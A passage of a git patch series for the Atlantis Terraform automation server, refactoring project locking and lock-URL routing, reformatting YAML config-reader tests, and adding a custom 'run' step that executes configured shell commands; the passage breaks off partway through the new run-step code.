"github.com/runatlantis/atlantis/testing" -) - -var ctx = events.CommandContext{ - Command: &events.Command{ - Name: events.Plan, - }, - Log: logging.NewNoopLogger(), -} -var project = models.Project{} - -func TestExecute_LockErr(t *testing.T) { - t.Log("when there is an error returned from TryLock we return it") - p, l, _, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_LockFailed(t *testing.T) { - t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") - p, l, _, _ := setupPreExecuteTest(t) - // The response has LockAcquired: false and the pull request is a number - // different than the current pull. - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: false, - CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}}, - }, nil) - - res := p.Execute(&ctx, "", project) - Equals(t, "This project is currently locked by #1. 
The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) -} - -func TestExecute_ConfigErr(t *testing.T) { - t.Log("when there is an error loading config, we return it") - p, l, _, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreInitErr(t *testing.T) { - t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - PreInit: []string{"pre-init"}, - }, nil) - tfVersion, _ := version.NewVersion("0.9.0") - When(tm.Version()).ThenReturn(tfVersion) - When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_InitErr(t *testing.T) { - t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") - p, l, tm, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) - tfVersion, _ := version.NewVersion("0.9.0") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) 
- - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreGetErr(t *testing.T) { - t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - PreGet: []string{"pre-get"}, - }, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_GetErr(t *testing.T) { - t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") - p, l, tm, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreCommandErr(t *testing.T) { - t.Log("when we get an error running pre commands we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - 
PrePlan: []string{"command"}, - }, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) - When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_SuccessTF9(t *testing.T) { - t.Log("when the project is on tf >= 0.9 it should be successful") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreInit: []string{"pre-init"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) - - res := p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") -} - -func TestExecute_SuccessTF8(t *testing.T) { - t.Log("when the project is on tf < 0.9 it should be successful") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreGet: []string{"pre-get"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - - res := 
p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") -} - -func TestExecute_SuccessPrePlan(t *testing.T) { - t.Log("when there are pre_plan commands they are run") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PrePlan: []string{"command"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - - res := p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") -} - -func TestExecute_SuccessPreApply(t *testing.T) { - t.Log("when there are pre_apply commands they are run") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreApply: []string{"command"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - - cpCtx := deepcopy.Copy(ctx).(events.CommandContext) - cpCtx.Command = &events.Command{ - Name: events.Apply, - } - cpCtx.Log = logging.NewNoopLogger() - - res := p.Execute(&cpCtx, "", project) - Equals(t, events.PreExecuteResult{ - 
ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") -} - -func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectPreExecutor, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { - RegisterMockTestingT(t) - l := lmocks.NewMockLocker() - cr := mocks.NewMockProjectConfigReader() - tm := tmocks.NewMockClient() - r := rmocks.NewMockRunner() - return &events.DefaultProjectPreExecutor{ - Locker: l, - ConfigReader: cr, - Terraform: tm, - Run: r, - }, l, tm, r -} diff --git a/server/router.go b/server/router.go new file mode 100644 index 0000000000..af9319b987 --- /dev/null +++ b/server/router.go @@ -0,0 +1,31 @@ +package server + +import ( + "fmt" + "net/url" + + "github.com/gorilla/mux" +) + +// Router can be used to retrieve Atlantis URLs. It acts as an intermediary +// between the underlying router and the rest of Atlantis that might need to +// know URLs to different resources. +type Router struct { + // Underlying is the router that the routes have been constructed on. + Underlying *mux.Router + // LockViewRouteName is the named route for the lock view that can be Get'd + // from the Underlying router. + LockViewRouteName string + // LockViewRouteIDQueryParam is the query parameter needed to construct the + // lock view: underlying.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id"). + LockViewRouteIDQueryParam string + // AtlantisURL is the fully qualified URL (scheme included) that Atlantis is + // being served at, ex: https://example.com. + AtlantisURL string +} + +// GenerateLockURL returns a fully qualified URL to view the lock at lockID. 
+func (r *Router) GenerateLockURL(lockID string) string { + path, _ := r.Underlying.Get(r.LockViewRouteName).URL(r.LockViewRouteIDQueryParam, url.QueryEscape(lockID)) + return fmt.Sprintf("%s%s", r.AtlantisURL, path) +} diff --git a/server/server.go b/server/server.go index ee0ffdf119..e53de94a11 100644 --- a/server/server.go +++ b/server/server.go @@ -36,6 +36,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -46,7 +47,16 @@ import ( "github.com/urfave/negroni" ) -const LockRouteName = "lock-detail" +const ( + // LockViewRouteName is the named route in mux.Router for the lock view. + // The route can be retrieved by this name, ex: + // mux.Router.Get(LockViewRouteName) + LockViewRouteName = "lock-detail" + // LockViewRouteIDQueryParam is the query parameter needed to construct the lock view + // route. ex: + // mux.Router.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id") + LockViewRouteIDQueryParam = "id" +) // Server runs the Atlantis web server. 
type Server struct { @@ -184,29 +194,44 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { workspace := &events.FileWorkspace{ DataDir: userConfig.DataDir, } - projectPreExecute := &events.DefaultProjectPreExecutor{ + projectLocker := &events.DefaultProjectLocker{ Locker: lockingClient, Run: run, ConfigReader: configReader, Terraform: terraformClient, } + executionPlanner := &repoconfig.ExecutionPlanner{ + ConfigReader: &repoconfig.Reader{}, + DefaultTFVersion: terraformClient.Version(), + TerraformExecutor: terraformClient, + } + underlyingRouter := mux.NewRouter() + router := &Router{ + AtlantisURL: userConfig.AtlantisURL, + LockViewRouteIDQueryParam: LockViewRouteIDQueryParam, + LockViewRouteName: LockViewRouteName, + Underlying: underlyingRouter, + } applyExecutor := &events.ApplyExecutor{ VCSClient: vcsClient, Terraform: terraformClient, RequireApproval: userConfig.RequireApproval, Run: run, AtlantisWorkspace: workspace, - ProjectPreExecute: projectPreExecute, + ProjectLocker: projectLocker, + ExecutionPlanner: executionPlanner, Webhooks: webhooksManager, } planExecutor := &events.PlanExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - Run: run, - Workspace: workspace, - ProjectPreExecute: projectPreExecute, - Locker: lockingClient, - ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Terraform: terraformClient, + Run: run, + Workspace: workspace, + ProjectLocker: projectLocker, + Locker: lockingClient, + ProjectFinder: &events.DefaultProjectFinder{}, + ExecutionPlanner: executionPlanner, + LockURLGenerator: router, } pullClosedExecutor := &events.PullClosedExecutor{ VCSClient: vcsClient, @@ -229,7 +254,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { commandHandler := &events.CommandHandler{ ApplyExecutor: applyExecutor, PlanExecutor: planExecutor, - LockURLGenerator: planExecutor, EventParser: eventParser, VCSClient: vcsClient, GithubPullGetter: githubClient, @@ -265,10 
+289,9 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, } - router := mux.NewRouter() return &Server{ AtlantisVersion: config.AtlantisVersion, - Router: router, + Router: underlyingRouter, Port: userConfig.Port, CommandHandler: commandHandler, Logger: logger, @@ -291,14 +314,7 @@ func (s *Server) Start() error { s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo})) s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST") s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}") - lockRoute := s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries("id", "{id}").Name(LockRouteName) - // function that planExecutor can use to construct detail view url - // injecting this here because this is the earliest routes are created - s.CommandHandler.SetLockURL(func(lockID string) string { - // ignoring error since guaranteed to succeed if "id" is specified - u, _ := lockRoute.URL("id", url.QueryEscape(lockID)) - return s.AtlantisURL + u.RequestURI() - }) + s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName) n := negroni.New(&negroni.Recovery{ Logger: log.New(os.Stdout, "", log.LstdFlags), PrintStack: false, @@ -349,7 +365,7 @@ func (s *Server) Index(w http.ResponseWriter, _ *http.Request) { var lockResults []LockIndexData for id, v := range locks { - lockURL, _ := s.Router.Get(LockRouteName).URL("id", url.QueryEscape(id)) + lockURL, _ := s.Router.Get(LockViewRouteName).URL("id", url.QueryEscape(id)) lockResults = append(lockResults, LockIndexData{ LockURL: lockURL.String(), RepoFullName: v.Project.RepoFullName, diff --git a/server/server_test.go b/server/server_test.go index aba146ef54..54776cfe9e 100644 --- 
a/server/server_test.go +++ b/server/server_test.go @@ -78,7 +78,7 @@ func TestIndex_Success(t *testing.T) { r := mux.NewRouter() atlantisVersion := "0.3.1" // Need to create a lock route since the server expects this route to exist. - r.NewRoute().Path("").Name(server.LockRouteName) + r.NewRoute().Path("").Name(server.LockViewRouteName) s := server.Server{ Locker: l, IndexTemplate: it, From aef8a632c3b86f716a098934bacd84b3836281f1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 6 Jun 2018 18:54:27 +0100 Subject: [PATCH 11/69] Make tests more readable --- server/events/repoconfig/reader.go | 3 +- server/events/repoconfig/reader_test.go | 73 ++++++++++++++++--------- 2 files changed, 47 insertions(+), 29 deletions(-) diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go index 77d4e505dc..7f2557e42d 100644 --- a/server/events/repoconfig/reader.go +++ b/server/events/repoconfig/reader.go @@ -18,8 +18,7 @@ const ApplyStageName = "apply" type Reader struct{} // ReadConfig returns the parsed and validated config for repoDir. -// If there was no config, it returns a nil pointer. If there was an error -// in parsing it returns the error. +// If there was no config, it returns a nil pointer. func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go index 20e36c9cf6..9d0eb5d962 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/repoconfig/reader_test.go @@ -80,14 +80,16 @@ func TestReadConfig_Invalid(t *testing.T) { // Invalid version. { description: "no version", - input: `projects: + input: ` +projects: - dir: "." `, expErr: "unknown version: must have \"version: 2\" set", }, { description: "unsupported version", - input: `version: 0 + input: ` +version: 0 projects: - dir: "." 
`, @@ -95,7 +97,8 @@ projects: }, { description: "empty version", - input: `version: ~ + input: ` +version: ~ projects: - dir: "." `, @@ -110,7 +113,8 @@ projects: }, { description: "empty projects list", - input: `version: 2 + input: ` +version: 2 projects:`, expErr: "'projects' key must exist and contain at least one element", }, @@ -118,41 +122,45 @@ projects:`, // Project must have dir set. { description: "project with no config", - input: `version: 2 + input: ` +version: 2 projects: -`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project without dir set", - input: `version: 2 + input: ` +version: 2 projects: - workspace: "staging"`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project with dir set to empty string", - input: `version: 2 + input: ` +version: 2 projects: - dir: ""`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project with no config at index 1", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." -`, expErr: "project at index 1 invalid: dir key must be set and non-empty", }, - // { - // "project with unknown key", - // `version: 2 - //projects: - //- unknown: value`, - // // todo: fix this test case - // "project at index 1 invalid: dir key must be set and non-empty", - // }, + { + description: "project with unknown key", + input: ` +version: 2 +projects: +- unknown: value`, + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", + }, // todo: more test cases // project workflow doesn't exist @@ -311,7 +319,8 @@ func TestReadConfig_Successes(t *testing.T) { }{ { description: "uses project defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "."`, expOutput: repoconfig.RepoConfig{ @@ -321,7 +330,8 @@ projects: }, { description: "autoplan is enabled by default", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." 
auto_plan: @@ -334,7 +344,8 @@ projects: }, { description: "if workflows not defined, there are none", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." `, @@ -345,7 +356,8 @@ projects: }, { description: "if workflows key set but with no workflows there are none", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: ~ @@ -357,7 +369,8 @@ workflows: ~ }, { description: "if a workflow is defined but set to null we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -391,7 +404,8 @@ workflows: }, { description: "if a plan or apply has no steps defined then we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -427,7 +441,8 @@ workflows: }, { description: "if a plan or apply has no steps defined then we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -463,7 +478,8 @@ workflows: }, { description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -490,7 +506,8 @@ workflows: }, { description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -517,7 +534,8 @@ workflows: }, { description: "if steps are set then we parse them properly", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -554,7 +572,8 @@ workflows: }, { description: "we parse extra_args for the steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." 
workflows: From d06f3ca3d259b6ea54a6ca15d992c68655367744 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 6 Jun 2018 22:12:30 +0100 Subject: [PATCH 12/69] Implement custom run step --- Gopkg.lock | 8 +- Gopkg.toml | 4 + server/events/plan_executor.go | 2 +- server/events/repoconfig/config.go | 39 +- server/events/repoconfig/execution_planner.go | 6 +- server/events/repoconfig/reader_test.go | 133 ++--- server/events/repoconfig/run_step.go | 35 ++ server/events/repoconfig/run_step_test.go | 3 + .../github.com/flynn-archive/go-shlex/COPYING | 202 ++++++++ .../flynn-archive/go-shlex/Makefile | 21 + .../flynn-archive/go-shlex/README.md | 2 + .../flynn-archive/go-shlex/shlex.go | 457 ++++++++++++++++++ .../flynn-archive/go-shlex/shlex_test.go | 162 +++++++ 13 files changed, 1009 insertions(+), 65 deletions(-) create mode 100644 server/events/repoconfig/run_step.go create mode 100644 server/events/repoconfig/run_step_test.go create mode 100644 vendor/github.com/flynn-archive/go-shlex/COPYING create mode 100644 vendor/github.com/flynn-archive/go-shlex/Makefile create mode 100644 vendor/github.com/flynn-archive/go-shlex/README.md create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex.go create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex_test.go diff --git a/Gopkg.lock b/Gopkg.lock index 9b1d483313..19c0ad71bb 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -25,6 +25,12 @@ revision = "570b54cabe6b8eb0bc2dfce68d964677d63b5260" version = "v1.5.0" +[[projects]] + branch = "master" + name = "github.com/flynn-archive/go-shlex" + packages = ["."] + revision = "3f9db97f856818214da2e1057f8ad84803971cff" + [[projects]] name = "github.com/fsnotify/fsnotify" packages = ["."] @@ -282,6 +288,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6" + inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd" solver-name = "gps-cdcl" solver-version = 1 
diff --git a/Gopkg.toml b/Gopkg.toml index 92f54862f5..749d2f189b 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -92,3 +92,7 @@ [[constraint]] name = "github.com/go-test/deep" version = "1.0.1" + +[[constraint]] + branch = "master" + name = "github.com/flynn-archive/go-shlex" diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index d994021723..4983c17701 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -30,7 +30,7 @@ type LockURLGenerator interface { GenerateLockURL(lockID string) string } -/**/ // PlanExecutor handles everything related to running terraform plan. +// PlanExecutor handles everything related to running terraform plan. type PlanExecutor struct { VCSClient vcs.ClientProxy Terraform terraform.Client diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go index 48a0a9e388..acdc7a0ce6 100644 --- a/server/events/repoconfig/config.go +++ b/server/events/repoconfig/config.go @@ -1,6 +1,11 @@ package repoconfig -import "fmt" +import ( + "fmt" + + "github.com/flynn-archive/go-shlex" + "github.com/pkg/errors" +) type RepoConfig struct { Version int `yaml:"version"` @@ -61,6 +66,16 @@ type Workflow struct { } func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Check if they forgot to set the "steps" key. + type MissingSteps struct { + Apply []interface{} + Plan []interface{} + } + var missingSteps MissingSteps + if err := unmarshal(&missingSteps); err == nil { + return errors.New("missing \"steps\" key") + } + // Use a type alias so unmarshal doesn't get into an infinite loop. type alias Workflow var tmp alias @@ -103,6 +118,9 @@ type Stage struct { type StepConfig struct { StepType string ExtraArgs []string + // Run will be set if the StepType is "run". This is for custom commands. + // Ex. if the key is `run: echo hi` then Run will be "echo hi". 
+ Run []string } func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { @@ -174,15 +192,20 @@ func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { return validateBuiltIn("apply", applyStep.Apply) } - // todo: run step // Try to unmarshal as a custom run step, ex. // steps: // - run: my command - //var runStep struct { - // Run string `yaml:"run"` - //} - //if err = unmarshal(&runStep); err == nil { - // - //} + var runStep struct { + Run string `yaml:"run"` + } + if err = unmarshal(&runStep); err == nil { + s.StepType = "run" + parts, err := shlex.Split(runStep.Run) + if err != nil { + return err + } + s.Run = parts + } + return err } diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go index 02cba0496f..c94001925e 100644 --- a/server/events/repoconfig/execution_planner.go +++ b/server/events/repoconfig/execution_planner.go @@ -85,8 +85,12 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } + case "run": + step = &RunStep{ + Meta: meta, + Commands: stepConfig.Run, + } } - // todo: custom step steps = append(steps, step) } return steps, nil diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go index 9d0eb5d962..02fa41b342 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/repoconfig/reader_test.go @@ -161,7 +161,6 @@ projects: - unknown: value`, expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", }, - // todo: more test cases // project workflow doesn't exist // workflow has plan and apply keys (otherwise no point specifying it) @@ -280,6 +279,33 @@ workflows: `, expErr: "expected array of strings as value of extra_args, not \"arg\"", }, + { + description: "invalid step type", + input: ` +version: 2 +projects: +- dir: "." 
+workflows: + default: + plan: + steps: + - rn: echo should fail +`, + expErr: "yaml: unmarshal errors:\n line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }", + }, + { + description: "missed the steps key and just set an array directly", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + - init +`, + expErr: "missing \"steps\" key", + }, } tmpDir, cleanup := TempDir(t) @@ -408,43 +434,6 @@ workflows: version: 2 projects: - dir: "." -workflows: - default: - plan: - apply: -`, - expOutput: repoconfig.RepoConfig{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ - "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply has no steps defined then we use the defaults", - input: ` -version: 2 -projects: -- dir: "." 
workflows: default: plan: @@ -505,7 +494,7 @@ workflows: }, }, { - description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + description: "if steps are set then we parse them properly", input: ` version: 2 projects: @@ -514,8 +503,12 @@ workflows: default: plan: steps: + - init + - plan apply: steps: + - plan # we don't validate if they make sense + - apply `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -523,17 +516,31 @@ workflows: Workflows: map[string]repoconfig.Workflow{ "default": { Plan: &repoconfig.Stage{ - Steps: nil, + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, }, Apply: &repoconfig.Stage{ - Steps: nil, + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + }, + { + StepType: "apply", + }, + }, }, }, }, }, }, { - description: "if steps are set then we parse them properly", + description: "we parse extra_args for the steps", input: ` version: 2 projects: @@ -542,10 +549,18 @@ workflows: default: plan: steps: - - init + - init: + extra_args: [] + - plan: + extra_args: + - arg1 + - arg2 apply: steps: - - plan # we don't validate if they make sense + - plan: + extra_args: [a, b] + - apply: + extra_args: ["a", "b"] `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -555,14 +570,24 @@ workflows: Plan: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "init", + StepType: "init", + ExtraArgs: nil, + }, + { + StepType: "plan", + ExtraArgs: []string{"arg1", "arg2"}, }, }, }, Apply: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "plan", + StepType: "plan", + ExtraArgs: []string{"a", "b"}, + }, + { + StepType: "apply", + ExtraArgs: []string{"a", "b"}, }, }, }, @@ -571,7 +596,7 @@ workflows: }, }, { - description: "we parse extra_args for the steps", + description: "custom steps are parsed", input: ` version: 2 projects: @@ -580,12 +605,10 @@ workflows: default: plan: steps: - - init: - extra_args: [] + - run: "echo \"plan hi\"" 
apply: steps: - - plan: - extra_args: ["a", "b"] + - run: echo apply "arg 2" `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -595,16 +618,18 @@ workflows: Plan: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "init", + StepType: "run", ExtraArgs: nil, + Run: []string{"echo", "plan hi"}, }, }, }, Apply: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "plan", - ExtraArgs: []string{"a", "b"}, + StepType: "run", + ExtraArgs: nil, + Run: []string{"echo", "apply", "arg 2"}, }, }, }, diff --git a/server/events/repoconfig/run_step.go b/server/events/repoconfig/run_step.go new file mode 100644 index 0000000000..7a157bb6fb --- /dev/null +++ b/server/events/repoconfig/run_step.go @@ -0,0 +1,35 @@ +package repoconfig + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/pkg/errors" +) + +// RunStep runs custom commands. +type RunStep struct { + Commands []string + Meta StepMeta +} + +func (r *RunStep) Run() (string, error) { + if len(r.Commands) < 1 { + return "", errors.New("no commands for run step") + } + path := r.Meta.AbsolutePath + + cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec + cmd.Dir = path + out, err := cmd.CombinedOutput() + + commandStr := 